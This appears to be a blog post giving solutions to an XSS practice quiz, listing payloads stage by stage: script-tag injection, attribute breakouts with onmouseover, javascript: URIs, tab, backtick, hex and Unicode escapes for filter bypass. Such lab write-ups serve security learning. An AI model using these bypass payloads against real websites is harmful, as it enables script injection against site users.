关闭

xss_quiz

146人阅读 评论(0) 收藏 举报
分类:

练习地址:xss_quiz


Stage #1

<script>alert(document.domain)</script>


Stage #2

"><script>alert(document.domain)</script>


Stage #3


Stage #4

Stage #5

用firebug,删除 maxlength="15"

text box中:"><script>alert(document.domain)</script>


Stage #6

" onmouseover="alert(document.domain);"


Stage #7

" onmouseover=alert(document.domain);


Stage #8

javascript:alert(document.domain);


Stage #9

Hint: UTF-7 XSS

提示为UTF-7,未利用成功。


Stage #10

"><script>alert(document.dodomainmain)</script>


Stage #11

"><a href="javascrip&#09;t:alert(document.domain);">foo</a>


Stage #12

``onmouseover=alert(document.domain);

(IE Only)


Stage #13


Stage #14


Stage #15

对'>' '<' 进行16进制编码

\\x3Cscript\\x3Ealert(document.domain)\\x3C/script\\x3E


Stage #16

对'>' '<' 进行Unicode编码

\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e


Stage #17

Stage #18


0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场